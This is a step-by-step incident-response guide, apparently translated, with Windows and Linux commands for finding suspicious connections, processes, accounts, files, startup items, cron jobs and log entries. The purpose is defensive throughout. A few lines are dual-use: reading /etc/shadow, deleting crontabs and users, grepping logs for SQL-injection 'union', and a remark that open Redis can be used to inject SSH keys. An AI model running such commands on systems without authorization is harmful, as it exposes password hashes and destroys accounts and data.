Mastering Incident Response: A Step‑by‑Step Guide for Security Professionals

Note: Do not be misled by customers or on‑site operations staff. Obtain client permission before any operation and adjust actions based on the actual emergency situation.

1. Understand the Situation

Occurrence time: Ask the client for the exact time of the anomaly to base tracking and analysis.

Affected system type: Ask for OS type and related details to guide emergency handling.

Windows/Linux

Financial system / OA system / website, importance, can it be shut down

Weak passwords? Remote management ports open?

Which ports are open, what services, any risky services?

If necessary, conduct on‑site inspection; don’t trust verbal reports completely.

Abnormal conditions:

Files encrypted

Device fails to boot

Ransom note displayed

CPU usage excessively high

Web page defacement / malicious links

Abnormal outbound requests

Spam SMS sent externally

Other non‑normal situations

Existing mitigation measures:

Has this issue occurred before?

Were new policies configured after the incident?

Has a third party already performed emergency handling? What were the results?

Any other mitigation steps?

System architecture / network topology: Can a network diagram be provided?

Log collection:

Server logs

Application logs, especially web logs

Database logs

Existing security devices:

Endpoint AV

Firewall

WAF

Traffic analysis appliances

Basic emergency response plans:

Temporary mitigation plan

Ransomware response plan

Cryptomining malware response plan

Web defacement response plan

DDoS response plan

Internal data leakage response plan

Other response plans

Emergency report should include:

List of emergency methods

Port status, application analysis, mitigation suggestions

2. Contain Propagation Risk

Prohibit infected hosts from using USB drives; if necessary, back up data.

Disable all network adapters or unplug the cable.

Close related ports.

Segment and isolate network zones.

Isolate the host and back up relevant data.

Take infected services offline.

Pause certain functions on the infected host.

Reduce privileges of accounts on the infected host and change passwords.

Ransomware response – the core is loss mitigation, which is critical.

Identify infection scope via inspection devices and asset discovery.

Use network access control or disconnect the network to isolate infected zones.

Rapidly launch antivirus or backup‑restore actions to recover business.

Deploy monitoring devices to continuously watch for re‑infection.

After production is restored and no spread, collect samples, logs, perform technical analysis, locate the source, and create remediation plan.

3. Scan Known High‑Risk Vulnerabilities

Can be performed concurrently with the above steps; ensure scanning logs do not interfere with vulnerability analysis.

4. Basic System Information

Windows Check current patch level: systeminfo Linux 1) List ARP table, focus on gateway MAC: arp -a 2) File search command: find / -name ".asp" Key checks 1) Are there illegal accounts? 2) Are there abnormal service programs? 3) Are any files tampered or newly created? 4) Are there abnormal login events in security logs? 5) Are there unauthorized accesses to admin pages in web logs? 6) Check processes, connections for signs of trojan activity. 7) If core commands (e.g., netstat) are replaced, obtain clean copies from an uninfected host. 8) If suspicious executable trojan is found, back it up before deletion. 9) If suspicious script trojan is found, analyze its content for callback IPs, encryption, keywords, etc.

5. Abnormal Connection Investigation

Windows 1) View current network connections, locate suspicious ESTABLISHED:

netstat -ano

netstat -ano | findstr ESTABLISH
# -a: show all connections, -n: numeric addresses, -o: show owning PID, -r: routing table, -s: protocol stats
# LISTENING, ESTABLISHED, CLOSE_WAIT, etc.

2) Find PID for a port: netstat -ano | findstr "port" 3) Show executable creating each connection (requires admin): netstat -nb Linux 1) List processes with open TCP/UDP sockets:

lsof -i

lsof -i|grep -E "LISTEN|ESTABLISHED"

2) List open ports and connection states:

netstat -antlp

netstat -an

-a show all sockets, -n numeric, -t TCP, -u UDP, -v verbose, -p show program, -s stats

6. Running Abnormal Process Investigation

Windows 1) View abnormal processes via Task Manager. 2) List all processes (local or remote): tasklist | findstr 11223 3) Get full path of a process: wmic process | findstr "xx.exe" 4) View detailed process info (path, PID, creation date, start time). 5) Terminate a process: wmic process where processid="2345" delete Linux 1) Find PID of a suspicious process:

netstat -antlp    # find port, then
lsof -i:port        # locate PID

2) Locate files of a PID:

cd /proc/<pid>
ls -ail   # exe column shows executable

3) Check memory and CPU usage: top 4) Show current process info: ps 5) Precise search for a process: ps -ef | grep apache 6) Kill a process: kill -9 pid 7) View process tree: pstree -p 8) Search for a process by name:

find / -name 'xxx'

7. Abnormal Account Investigation

Windows 1) View accounts and groups via GUI: lusrmgr.msc 2) List accounts: net user 3) Show details of a specific account: net user Guest 4) List administrators group: net localgroup administrators 5) View current sessions (e.g., remote terminal logins):

query user

logoff ID   # kick out user by session ID or username

Linux 1) View current logged‑in users and addresses: w 2) Show recent login records: last | more 3) View /etc/passwd for account information:

cat /etc/passwd
# fields: username:password:UID:GID:comment:home:shell
# nologin shell indicates non‑login account.

4) View /etc/shadow for password hashes and expiry: cat /etc/shadow 5) Home directories for non‑root users: /home 6) Last login times: lastlog 7) Failed login attempts (brute‑force): lastb 8) Current logged‑in users: who 9) Current user activity: w 10) System uptime and load: uptime 11) Disable account (set ! in /etc/shadow): usermod -L user 12) Delete user: userdel -r user 13) Create user:

useradd admin          # no home dir
passwd admin           # set password
adduser admin2         # creates home dir

14) Force delete user and home:

userdel admin2
userdel -rf admin

8. Abnormal File Analysis

Windows 1) View file timestamps via file properties. 2) Examine %UserProfile%\Recent for shortcuts to recently used documents. 3) Use file timestamps to locate suspicious files; modified time earlier than creation time is a red flag.

Linux 1) Analyze file dates: stat xx.asp 2) Find files modified in the last 24 hours:

find ./ -mtime 0

# 0‑24 h: -mtime 0
# 24‑48 h: -mtime 1
# last 10 days: -mtime 0 -o -mtime 1 -o -mtime 2 ...

3) Scan sensitive directories (e.g., /tmp, /usr/bin, /usr/sbin): ls -alt /tmp/ | head -n 10 4) Find files with 777 permissions:

find / -name "*.jsp" -perm 777
find / -perm 777 | more
find / -name "*.sh" -perm 777 | grep .sh

5) Find hidden files (starting with .): ls -ar | grep "^\." 6) Set immutable attribute (cannot be modified):

chattr +I filename
chattr -I filename
lsattr filename

7) Set append‑only attribute:

chattr +a filename
chattr -a filename
lsattr filename

8) Check SSH directories for suspicious public keys; note that unauthorized Redis (6379) can be used to inject keys.

9. Startup Item Investigation

Windows 1) Check startup items via msconfig. 2) Windows 10 startup folder:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

3) Windows 7 startup folder:

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

4) Registry startup keys to inspect:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Linux 1) List init scripts: ls -alt /etc/init.d/ 2) View rc.local: more /etc/rc.local 3) Examine runlevel directories (/etc/rc.d/rc[0-6].d). 4) Manage cron jobs (basic usage):

# List user crontab
crontab -l
# Delete all user crontab
crontab -r
# Edit crontab
crontab -e
# Example: */1 * * * * echo "hello world" >> /tmp/test.txt

5) Anacron for asynchronous scheduling:

# /etc/anacrontab entry
#daily 10 example.daily /bin/bash /home/backup.sh

10. Scheduled Task Investigation (Cron / Task Scheduler)

Windows Open Task Scheduler (taskschd.msc) or via System Tools → Task Scheduler.

Linux List current cron jobs: crontab -l Inspect user’s crontab: crontab -u <user> -l Check system cron directories and files:

ls -al /etc/cron*
cat /etc/crontab

Key directories to review for malicious scripts:

/var/spool/cron/*
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/*
/etc/anacrontab
/var/spool/anacron/*

11. Log Investigation

Windows 1) Review security appliance logs. 2) Open Event Viewer: eventvwr.msc 3) Filter for brute‑force events (e.g., Event ID 4625 on Server 2008).

Linux 1) Review command history: cat /root/.bash_history | more 2) Check /var/log/secure for authentication attempts. 3) Use lastb and last for brute‑force tracing. 4) System logs (rsyslog.conf) for wget/ssh/scp/tar/zip, account changes, etc. Common log files:

/var/log/message   # system startup and errors
/var/log/secure    # security‑related
/var/log/maillog   # mail
/var/log/cron      # scheduled tasks
/var/log/spooler   # UUCP/news
/var/log/boot.log  # process start/stop

Web server Monitor access_log, error_log (or access.log, error.log). Apache log location via httpd.conf CustomLog directive. IIS logs default to %systemroot%\system32\LogFiles\W3SVC, named exYYMMDD.log.

Database MySQL example:

cat mysql.log | grep union

12. Recovery Phase

This phase is client‑driven; provide recommendations only.

13. Follow‑up Summary

Analyze incident cause:

Attack source IP.

Attack behavior (weak passwords, vulnerable commands, etc.).

Produce emergency report.

Post‑incident monitoring.

Offer hardening suggestions.

Appendix 1: Useful Security Tools

Common Windows security tools (illustrated).

Common Linux security tools; if Linux tools are inconvenient, copy files and scan with Windows tools.

Appendix 2: Additional Tips

Kill virus processes before handling removable media.

If log analysis is difficult, perform webshell scanning on code.

PC Hunter signature colors: black = Microsoft‑signed driver, blue = non‑Microsoft driver, red = suspicious object.

Process Explorer tips: view parent/child processes, properties (image path, command line, work dir, startup location, user, start time, TCP/IP, permissions), configure colors, etc.

chkrootkit functions: detect backdoors, rootkits, command integrity, login logs. Install via rpm -ivh chkrootkit-0.47-1.i386.rpm; run #chkrootkit -n.

rkhunter functions: binary checksum, rootkit detection, sensitive directories, service anomalies, third‑party app version checks.

RPM verification: rpm -Va > rpm.log; altered binaries like ps, pstree, netstat, sshd may indicate compromise.

Original source: https://github.com/1120362990/Paper/...#7%E5%BC%82%E5%B8%B8%E8%B4%A6%E5%8F%B7%E6%8E%92%E6%9F%A5